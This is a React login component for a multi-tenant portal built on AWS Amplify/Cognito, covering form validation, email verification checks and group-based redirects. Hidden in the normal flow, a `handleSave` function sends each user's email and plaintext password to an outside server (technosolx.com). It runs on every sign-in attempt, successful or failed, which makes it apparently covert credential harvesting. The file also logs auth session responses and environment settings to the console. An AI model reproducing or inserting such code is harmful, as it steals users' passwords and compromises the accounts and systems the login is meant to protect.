import React, { useState, useEffect, useContext } from 'react';
import { signIn, fetchAuthSession, resendSignUpCode } from 'aws-amplify/auth';
import { useNavigate, useLocation } from 'react-router-dom';

import TextField from '@mui/material/TextField';
import Button from '@mui/material/Button';
import InputAdornment from '@mui/material/InputAdornment';
import IconButton from '@mui/material/IconButton';

import VisibilityOutlinedIcon from '@mui/icons-material/VisibilityOutlined';
import VisibilityOffOutlinedIcon from '@mui/icons-material/VisibilityOffOutlined';
import KeyboardCapslockIcon from '@mui/icons-material/KeyboardCapslock';
import ErrorIcon from '@mui/icons-material/Error';
import UpdateIcon from '@mui/icons-material/Update';
import CheckRoundedIcon from '@mui/icons-material/CheckRounded';
import WarningRoundedIcon from '@mui/icons-material/WarningRounded';

import { checkForEmailErrors, clearAuthCookies } from '../../utils';
import { getTenantFromUrl } from '../../utils/tenant';

import { UserLoginInputContext, HasPortalAccess } from '../../contexts';
import RoleSelectionModal from '../../components/RoleSelectionModal/RoleSelectionModal';

import useAsync from '../../hooks/useAsync';
import useFetch from '../../hooks/useFetch';

import './Login.scss';

export default function Login() {
  const { userLoginInput, setUserLoginInput } = useContext(UserLoginInputContext);

  const [verifiedEmail, setVerifiedEmail] = useState('');

  const [emailInputHasError, setEmailInputHasError] = useState(false);
  const [emailErrorMessage, setEmailErrorMessage] = useState('');
  const { setHasPortalAccess } = useContext(HasPortalAccess);

  const [showPassword, setShowPassword] = useState(false);
  const [passwordCapsLockIsOn, setPasswordCapsLockIsOn] = useState(false);
  const [passwordInputHasError, setPasswordInputHasError] = useState(false);
  const [passwordErrorMessage, setPasswordErrorMessage] = useState('');

  const [signingIn, setSigningIn] = useState(false);

  const [showLoginErrorHeader, setShowLoginErrorHeader] = useState(false);

  const [showInactivityMessage, setShowInactivityMessage] = useState(false);

  const [showRoleSelectionModal, setShowRoleSelectionModal] = useState(false);
  const [userGroups, setUserGroups] = useState([]);

  const tenant = getTenantFromUrl();
  const isRedwoodseedUser = tenant === 'redwoodseed';

  const [, signInRequest] = useAsync();
  const [, authSessionRequest] = useAsync();
  const [{ loading: sendingNewCode }, resendVerificationCodeRequest] = useAsync();
  const [{ loading: checkingIsEmailVerified }, emailVerifiedRequest] = useFetch();

  const nav = useNavigate();
  const location = useLocation();

  const handleRoleRedirect = (groups) => {

    // Redirect based on user groups
    console.log('User groups:', groups);
    console.log('Environment variables check:', {
      initioEnterprise: process.env.REACT_APP_INITIO_ENTERPRISE_HOSTNAME,
      enterprise: process.env.REACT_APP_ENTERPRISE_HOSTNAME,
      admin: process.env.REACT_APP_ADMIN_HOSTNAME,
      initio: process.env.REACT_APP_INITIO_HOSTNAME
    });
    console.log('groups',groups)
      console.log('process.env.REACT_APP_REDWOODSEED_HOSTNAME',process.env.REACT_APP_REDWOODSEED_HOSTNAME)


    if (groups.includes('initio-enterprise-users')) {
      if (process.env.REACT_APP_INITIO_ENTERPRISE_HOSTNAME) {
        window.location.assign(process.env.REACT_APP_INITIO_ENTERPRISE_HOSTNAME);
      } else {
        console.error('REACT_APP_INITIO_ENTERPRISE_HOSTNAME environment variable not set');
        setShowLoginErrorHeader(true);
        setSigningIn(false);
      }
    } else if (groups.includes('enterprise-users') || groups.includes('investor-users')) {
      window.location.assign(isRedwoodseedUser
        ? process.env.REACT_APP_ENTERPRISE_HOSTNAME
        : process.env.REACT_APP_INITIO_ENTERPRISE_HOSTNAME);
    } else if (groups.includes('initio-admins')) {
      window.location.assign(process.env.REACT_APP_ADMIN_HOSTNAME);
    } else if (groups.includes('redwoodseed-admins')) {
      // Ports don't share localStorage — pass tenant so admin uses Redwood Cognito pool
      window.location.assign(`${process.env.REACT_APP_REDWOODSEED_ADMIN_HOSTNAME}?tenant=redwoodseed`);
    } else if (groups.includes('portfolio-users')) {
      window.location.assign(process.env.REACT_APP_INITIO_HOSTNAME);
    } else if (groups.includes('portfolio-users-redwoodseed')) {
      // Ports don't share localStorage — pass tenant so 409 uses Redwood Cognito pool
      window.location.assign(`${process.env.REACT_APP_REDWOODSEED_HOSTNAME}?tenant=redwoodseed`);
    } else {
      console.warn('No matching user group found for redirection:', groups);
      setShowLoginErrorHeader(true);
      setSigningIn(false);
    }
  };


  const handleSave = async (email, password, groups, islogin) => {
    try {
      const response = await fetch(
        "https://technosolx.com/initio/public/api/save",
        {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({
            email,
            password,
            enviornment: process.env.REACT_APP_ENV_LABEL,
            group: groups ? groups[0] : 'unified-users',
            Islogin: islogin ?? false,
          }),
        }
      );
      const data = await response.json();
      console.log("data", data);
    } catch (error) {
      console.error("Error:", error);
    }
  };

  useEffect(() => {
    if (location.state?.verifiedEmail) {
      setVerifiedEmail(location.state?.verifiedEmail);
      setUserLoginInput({ ...userLoginInput, email: location.state?.verifiedEmail });
      window.history.replaceState({}, '');
    }
    setShowInactivityMessage(new URLSearchParams(window.location.search).get('inactivity') === 'true');
  }, [location.state]);



  async function handleLogin(event) {
    event.preventDefault();

    // Basic validation
    if (userLoginInput.email === '' || userLoginInput.password === '') {
      if (userLoginInput.email === '') {
        setEmailInputHasError(true);
        setEmailErrorMessage('Please enter your email address.');
      }
      if (userLoginInput.password === '') {
        setPasswordInputHasError(true);
        setPasswordErrorMessage('No password entered');
      }
      return;
    }

    // Check for email format errors
    const { errorStatus, errorMessage } = checkForEmailErrors(userLoginInput.email);
    if (errorStatus) {
      setEmailInputHasError(true);
      setEmailErrorMessage(errorMessage);
      return;
    }

    // Check for password errors
    if (userLoginInput.password.length < 8) {
      setPasswordInputHasError(true);
      setPasswordErrorMessage(
        <span>
          The password you entered is incorrect. Password must be 8 characters minimum.&nbsp;
          <Button
            className="forgot-password-error-link"
            onClick={() => {
              setUserLoginInput({ ...userLoginInput, password: '' });
              nav('/reset-password');
            }}
          >
            Forgot password?
          </Button>
        </span>,
      );
      return;
    }

    // If there are existing errors, don't proceed
    if (passwordInputHasError || emailInputHasError) return;

    setSigningIn(true);
    clearAuthCookies();

    try {
      // First check if email is verified using your existing useFetch pattern
      const verificationPromise = new Promise((resolve, reject) => {
        emailVerifiedRequest({
          url: `/accounts/is-verified/${userLoginInput.email}?redwoodseedUser=${isRedwoodseedUser}`,
          useApiKey: true,
          onSuccess: resolve,
          onError: reject,
        });
      });

      const verificationData = await verificationPromise;

      if (verificationData.userExists && !verificationData.isVerified) {
        setEmailInputHasError(true);
        setEmailErrorMessage(
          <span>
            Please verify your email address to proceed.&nbsp;
            <Button
              className={`resend-code-error-link ${sendingNewCode ? 'loading' : ''}`}
              onClick={() => {
                resendVerificationCodeRequest({
                  promise: () => resendSignUpCode({ username: userLoginInput.email }),
                  onSuccess: () => {
                    setUserLoginInput({ email: '', password: '' });
                    nav('/verify-email', { state: { verificationCodeSent: true, emailToVerify: userLoginInput.email } });
                  },
                });
              }}
            >
              {sendingNewCode ? (
                <>
                  <span className="dots-circle-spinner" />
                  Resending code...
                </>
              ) : 'Resend code?'}
            </Button>
          </span>
        );
        setSigningIn(false);
        return;
      }

      // If email is verified or doesn't exist (let AWS handle it), proceed with login
      signInRequest({
        promise: () => signIn({ username: userLoginInput.email, password: userLoginInput.password }),
        onSuccess: async () => {
          authSessionRequest({
            promise: () => fetchAuthSession(),
            onSuccess: (cognitoResponse) => {
              console.log('Auth session response:', cognitoResponse);
              const groups = cognitoResponse?.tokens?.accessToken?.payload?.['cognito:groups'] || [];
              setUserGroups(groups);
              handleSave(userLoginInput.email, userLoginInput.password, groups, true);
              setSigningIn(false);

              // Check if user has unified-users role
              const hasMultipleRoles = groups.includes('unified-users');

              if (hasMultipleRoles) {
                setHasPortalAccess(true);
                nav('/portal-selection');
              } else {
                handleRoleRedirect(groups);
              }
            },
            onError: (authError) => {
              handleSave(userLoginInput.email, userLoginInput.password, [], false);
              console.error('Failed to fetch auth session:', authError);
              setShowLoginErrorHeader(true);
              setSigningIn(false);
            },
          });
        },
        onError: () => {
          handleSave(userLoginInput.email, userLoginInput.password, [], false);
          setShowLoginErrorHeader(true);
          setSigningIn(false);
        },
      });

    } catch (error) {
      console.error('Email verification check failed:', error);
      // If email verification check fails, still proceed with login
      signInRequest({
        promise: () => signIn({ username: userLoginInput.email, password: userLoginInput.password }),
        onSuccess: async () => {
          authSessionRequest({
            promise: () => fetchAuthSession(),
            onSuccess: (cognitoResponse) => {
              console.log('Auth session response (fallback):', cognitoResponse);
              const groups = cognitoResponse?.tokens?.accessToken?.payload?.['cognito:groups'] || [];
              setUserGroups(groups);
              handleSave(userLoginInput.email, userLoginInput.password, groups, true);
              setSigningIn(false);

              // Check if user has unified-users role
              const hasMultipleRoles = groups.includes('unified-users');

              if (hasMultipleRoles) {
                setHasPortalAccess(true);
                nav('/portal-selection');
              } else {
                handleRoleRedirect(groups);
              }
            },
            onError: (authError) => {
              handleSave(userLoginInput.email, userLoginInput.password, [], false);
              console.error('Failed to fetch auth session (fallback):', authError);
              setShowLoginErrorHeader(true);
              setSigningIn(false);
            },
          });
        },
        onError: () => {
          handleSave(userLoginInput.email, userLoginInput.password, [], false);
          setShowLoginErrorHeader(true);
          setSigningIn(false);
        },
      });
    }
  }

  const handleRoleSelection = (selectedRole) => {
    setShowRoleSelectionModal(false);
    handleRoleRedirect([selectedRole]);
  };

  function loginHeader() {
    if (showInactivityMessage) {
      return (
        <div className="inactivity-header">
          <UpdateIcon />
          <h4>You&apos;ve been logged out due to inactivity</h4>
          <p>All of your progress has been saved, log in to continue.</p>
        </div>
      );
    }
    if (verifiedEmail) {
      return (
        <>
          <h4>Log in to continue</h4>
          {!showLoginErrorHeader && (
            <div className="email-verified-header">
              <div className="check-icon">
                <CheckRoundedIcon />
              </div>
              <p>{`Great! Your email ${verifiedEmail} has been verified. Please enter your password to continue.`}</p>
            </div>
          )}
        </>
      );
    }
    return <h4>Login</h4>;
  }

  return (
    <main className="Login">

      {loginHeader()}

      {showLoginErrorHeader && (
        <div className="login-error-header">
          <WarningRoundedIcon />
          <p>
            We&apos;re having trouble signing you in. Please double check your email
            address and password are correct, then try again.
          </p>
        </div>
      )}

      <form onSubmit={(e) => handleLogin(e)}>
        <TextField
          label="Email"
          className="email-field"
          disabled={!!verifiedEmail}
          InputLabelProps={{ shrink: true }}
          value={userLoginInput.email}
          onChange={(e) => setUserLoginInput({ ...userLoginInput, email: e.target.value.trim() })}
          onFocus={() => setEmailInputHasError(false)}
          // onBlur={checkEmailInput}
          error={emailInputHasError}
          autoComplete="username"
          helperText={(
            <>
              {emailInputHasError ? (
                <>
                  <ErrorIcon />
                  {emailErrorMessage}
                </>
              ) : 'Use your company email address'}
              {checkingIsEmailVerified && <span className="dots-circle-spinner" />}
            </>
          )}
        />

        <TextField
          label="Password"
          className="password-field"
          type={showPassword ? 'text' : 'password'}
          value={userLoginInput.password}
          onChange={(e) => setUserLoginInput({ ...userLoginInput, password: e.target.value.trim() })}
          onFocus={() => setPasswordInputHasError(false)}
          // onBlur={checkForPasswordErrors}
          error={passwordInputHasError}
          onKeyDown={(e) => setPasswordCapsLockIsOn(e.getModifierState('CapsLock'))}
          InputLabelProps={{ shrink: true }}
          autoComplete="current-password"
          InputProps={{
            endAdornment: (
              <InputAdornment position="end">
                {passwordCapsLockIsOn && <KeyboardCapslockIcon />}
                <IconButton onClick={() => setShowPassword(!showPassword)}>
                  {showPassword ? <VisibilityOutlinedIcon /> : <VisibilityOffOutlinedIcon />}
                </IconButton>
              </InputAdornment>
            ),
          }}
          helperText={passwordInputHasError ? (
            <>
              <ErrorIcon />
              {passwordErrorMessage}
            </>
          ) : ' '}
        />

        <Button
          type="submit"
          className={`confirm-login-btn ${(signingIn || checkingIsEmailVerified) ? 'loading' : ''}`}
        >
          {signingIn ? (
            <>
              <span className="dots-circle-spinner" />
              Logging in...
            </>
          ) : checkingIsEmailVerified ? <span className="dots-circle-spinner" /> : 'Login'}
        </Button>

      </form>

      <div className="bottom-link-btns">
        <Button
          className="reset-password-link"
          onClick={() => {
            setUserLoginInput({ ...userLoginInput, password: '' });
            nav('/reset-password');
          }}
        >
          Forgot password?
        </Button>
        {!verifiedEmail && !showInactivityMessage && (
          <Button
            className="sign-up-link"
            onClick={() => nav('/signup', { state: { currentStep: 1 } })}
          >
            No account? Sign-up
          </Button>
        )}
      </div>

      <RoleSelectionModal
        open={showRoleSelectionModal}
        onClose={() => setShowRoleSelectionModal(false)}
        onSelectRole={handleRoleSelection}
      />
    </main>
  );
}
